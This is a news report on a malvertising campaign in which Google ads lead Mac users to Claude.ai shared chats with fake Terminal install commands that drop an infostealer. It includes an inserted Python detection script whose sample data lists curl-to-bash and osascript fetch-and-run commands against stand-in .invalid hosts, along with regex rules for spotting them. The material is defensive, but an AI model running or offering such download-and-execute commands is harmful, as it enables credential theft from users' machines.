Attackers are abusing Google Ads and legitimate Claude.ai shared chats in a new malvertising campaign that targets Mac users looking for Claude downloads.

Users who search for “Claude mac download” may see sponsored Google search results that appear to point to the real claude.ai website. But instead of taking users to a safe download page, the ads lead to Claude shared chats that contain fake installation instructions designed to install malware on macOS devices.

The campaign was first spotted by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn. He found a Claude.ai shared chat that pretended to be an official “Claude Code on Mac” installation guide and falsely attributed the instructions to “Apple Support.”

The shared chat tells users to open Terminal and paste a command. That command silently downloads and runs malware on the victim’s Mac.

While checking Albayrak’s findings, BleepingComputer found another Claude shared chat being used for the same type of attack. The second version used different domains and payloads, but followed the same structure and social engineering method. Both chats were publicly accessible at the time of writing.

The malicious commands shown in the shared Claude chats download encoded shell scripts from attacker-controlled domains. One version observed by Albayrak used a domain linked to customroofingcontractors, while another version seen by BleepingComputer pulled a loader script from a separate domain.

In the second case, the downloaded loader script contained gzip-compressed shell instructions. The script ran entirely in memory, which makes it harder for users to notice anything unusual on the disk.

BleepingComputer also found that the server delivered a differently obfuscated version of the payload with each request. This method, known as polymorphic delivery, can make detection harder because security tools may not be able to rely on a single known file hash or signature.

One malware variant checked whether the Mac had Russian or CIS-region keyboard input sources configured. If it found one, the script stopped running and quietly sent a status message back to the attacker’s server. Devices that passed this check were allowed to continue to the next stage.

Before moving further, the script also collected the victim’s external IP address, hostname, macOS version, and keyboard locale. This information was sent back to the attacker, suggesting the operators were profiling victims before deciding whether to deliver the next payload.

The malware then downloaded a second-stage payload and ran it through osascript, a built-in macOS scripting tool. This allowed the attackers to execute code without dropping a traditional app or binary file.

The variant found by Albayrak appeared to work more directly. Instead of using the same profiling steps, it moved straight to execution. It stole browser credentials, cookies, and macOS Keychain data, then packed the information and sent it to the attacker’s server. Albayrak identified it as a variant of the MacSync macOS infostealer.
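The chain described above (fetch a remote script, decode and inflate it, hand it to a shell or osascript without touching disk) is what a defender can key on when per-request obfuscation makes file hashes useless. The following is an added example, not code from the article or from either researcher: a small triage script that scores shell command lines, of the kind an EDR records for Terminal activity, against behavioural rules for that chain. The sample commands, the rule weights, the threshold and the `.invalid` domains are all constructed for illustration.

```python
import re

# Constructed sample process telemetry (not real commands from the campaign):
# one shell command line per entry, as an EDR might record Terminal activity.
# Domains use the reserved .invalid TLD.
SAMPLE_COMMANDS = [
    'curl -fsSL https://loader.example.invalid/i.sh | bash',
    'bash -c "$(curl -fsSL https://cdn.example.invalid/s)"',
    'curl -s https://x.example.invalid/p | base64 -d | gunzip | sh',
    'osascript -e "do shell script \\"$(curl -fsSL https://y.example.invalid/q)\\""',
    'brew install --cask firefox',
    'ls -la ~/Downloads',
]

# Behavioural signals of the "paste this into Terminal" chain described in the
# article: fetch a remote script, decode/inflate it, and hand it to a shell or
# osascript without writing a file. Weights are a hypothetical tuning choice.
RULES = [
    ("remote_fetch",          re.compile(r"\b(curl|wget)\b"),                 1),
    ("pipe_to_shell",         re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b"),      2),
    ("fetch_in_substitution", re.compile(r"\$\(\s*(curl|wget)\b"),            2),
    ("base64_decode",         re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),   1),
    ("inflate_in_memory",     re.compile(r"\b(gunzip|zcat|gzip\s+-d\w*)\b"),  1),
    ("osascript_exec",        re.compile(r"\bosascript\b"),                   1),
]

URL_HOST = re.compile(r"https?://([^/\s\"')]+)")


def analyze(command: str) -> dict:
    """Score one command line and list which rules matched."""
    hits = [name for name, pattern, _ in RULES if pattern.search(command)]
    score = sum(weight for name, _, weight in RULES if name in hits)
    return {"score": score, "hits": hits, "hosts": URL_HOST.findall(command)}


def triage(commands, threshold=3, allowed_hosts=frozenset()):
    """Return (command, score, hits) for lines at or above the threshold.

    A line whose URLs all point at allow-listed hosts is skipped, so a known
    internal installer can use curl | sh without paging anyone.
    """
    flagged = []
    for cmd in commands:
        result = analyze(cmd)
        if result["score"] < threshold:
            continue
        if result["hosts"] and all(h in allowed_hosts for h in result["hosts"]):
            continue
        flagged.append((cmd, result["score"], result["hits"]))
    return flagged


if __name__ == "__main__":
    for cmd, score, hits in triage(SAMPLE_COMMANDS):
        print(f"[{score}] {cmd}\n      {', '.join(hits)}")
```

The rules deliberately ignore the URL and the payload bytes, since the article notes the server changed the obfuscation on every request; the shape of the command is what stays constant. Expect legitimate noise: Homebrew's own install one-liner has the same `bash -c "$(curl ...)"` shape, so the host allow list is what keeps this from firing on every new developer laptop.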

Malvertising has become a common way to spread malware. In many previous campaigns, attackers used Google ads that looked legitimate but sent users to fake websites. This campaign is different because the visible destination is not a fake domain. The ads point to Anthropic’s real claude.ai domain, while the malicious instructions are hosted inside Claude’s own shared chat feature.
